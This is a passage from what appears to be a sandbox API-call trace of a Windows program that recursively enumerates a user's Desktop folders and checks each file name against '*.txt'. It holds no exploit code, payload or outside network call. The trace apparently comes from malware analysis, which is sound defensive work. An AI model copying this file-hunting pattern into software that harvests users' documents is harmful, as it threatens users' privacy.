returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.629] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.629] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="eUCY-_yVF.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf" [0110.629] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.629] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.629] lstrcatW (in: lpString1="\\KTOu\\", lpString2="eUCY-_yVF.swf" | out: lpString1="\\KTOu\\eUCY-_yVF.swf") returned="\\KTOu\\eUCY-_yVF.swf" [0110.629] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.629] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x29a0560 [0110.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x29a0560, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", lpUsedDefaultChar=0x0) returned 50 [0110.629] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x39700d0 [0110.630] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.630] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.630] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.630] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.630] PathMatchSpecW (pszFile="eUCY-_yVF.swf", pszSpec="*.txt") returned 0 [0110.630] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.630] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58f2e50, ftCreationTime.dwHighDateTime=0x1d7b054, ftLastAccessTime.dwLowDateTime=0xe568fc80, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xe568fc80, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xb99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HLPCM ND3Cl3FgAs3.mp4", cAlternateFileName="HLPCMN~1.MP4")) returned 1 [0110.630] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.630] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.630] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.630] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.630] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.630] lstrcatW (in: lpString1="\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.630] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.630] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x39700d0 [0110.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x39700d0, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", lpUsedDefaultChar=0x0) returned 58 [0110.630] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a11c0 [0110.630] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.630] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.630] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.630] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.630] PathMatchSpecW (pszFile="HLPCM ND3Cl3FgAs3.mp4", pszSpec="*.txt") returned 0 [0110.631] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.631] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9803e0, ftCreationTime.dwHighDateTime=0x1d7a67d, ftLastAccessTime.dwLowDateTime=0xc285fda0, ftLastAccessTime.dwHighDateTime=0x1d7ada1, ftLastWriteTime.dwLowDateTime=0xc285fda0, ftLastWriteTime.dwHighDateTime=0x1d7ada1, nFileSizeHigh=0x0, nFileSizeLow=0x910b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LQQ8KQ8OZpD-.wav", cAlternateFileName="LQQ8KQ~1.WAV")) returned 1 [0110.631] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.631] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.631] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.631] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.631] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.631] lstrcatW (in: lpString1="\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="\\KTOu\\LQQ8KQ8OZpD-.wav") returned="\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.631] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.631] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x29a0560 [0110.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x29a0560, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", lpUsedDefaultChar=0x0) returned 53 [0110.631] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x39700d0 [0110.631] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.631] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.631] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.631] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.631] PathMatchSpecW (pszFile="LQQ8KQ8OZpD-.wav", pszSpec="*.txt") returned 0 [0110.631] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.631] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQEQQujqhNYM", cAlternateFileName="UQEQQU~1")) returned 1 [0110.631] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.631] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.631] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.631] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.631] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.632] lstrcatW (in: lpString1="\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.632] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2=".") returned 1 [0110.632] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2="..") returned 1 [0110.632] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.632] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*" [0110.632] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743420 [0110.632] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.632] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.632] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\." [0110.632] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.632] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.632] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\.") returned="\\KTOu\\UQEQQujqhNYM\\." [0110.632] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.632] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.632] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.632] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.632] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.." [0110.632] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.632] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.632] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\..") returned="\\KTOu\\UQEQQujqhNYM\\.." [0110.632] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.633] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.633] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13220d0, ftCreationTime.dwHighDateTime=0x1d79ffb, ftLastAccessTime.dwLowDateTime=0xb8ee8eb0, ftLastAccessTime.dwHighDateTime=0x1d7a126, ftLastWriteTime.dwLowDateTime=0xb8ee8eb0, ftLastWriteTime.dwHighDateTime=0x1d7a126, nFileSizeHigh=0x0, nFileSizeLow=0x16d3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LlE7.doc", cAlternateFileName="")) returned 1 [0110.633] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.633] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.633] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.633] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.633] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.633] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.633] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.633] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x39700d0 [0110.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x39700d0, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", lpUsedDefaultChar=0x0) returned 58 [0110.633] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2978 [0110.633] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.633] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.633] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.633] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.633] PathMatchSpecW (pszFile="LlE7.doc", pszSpec="*.txt") returned 0 [0110.633] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2978 | out: hHeap=0x29a0000) returned 1 [0110.633] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4773fc0, ftCreationTime.dwHighDateTime=0x1d7ab51, ftLastAccessTime.dwLowDateTime=0xfbe70ad0, ftLastAccessTime.dwHighDateTime=0x1d7ab5d, ftLastWriteTime.dwLowDateTime=0xfbe70ad0, ftLastWriteTime.dwHighDateTime=0x1d7ab5d, nFileSizeHigh=0x0, nFileSizeLow=0x1566b, dwReserved0=0x0, dwReserved1=0x0, cFileName="s ICeshe.bmp", cAlternateFileName="SICESH~1.BMP")) returned 1 [0110.633] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.633] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.633] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.633] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.633] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.634] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.634] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.634] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2a98 [0110.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x29a2a98, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", lpUsedDefaultChar=0x0) returned 62 [0110.634] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2810 [0110.634] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a98 | out: hHeap=0x29a0000) returned 1 [0110.634] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, 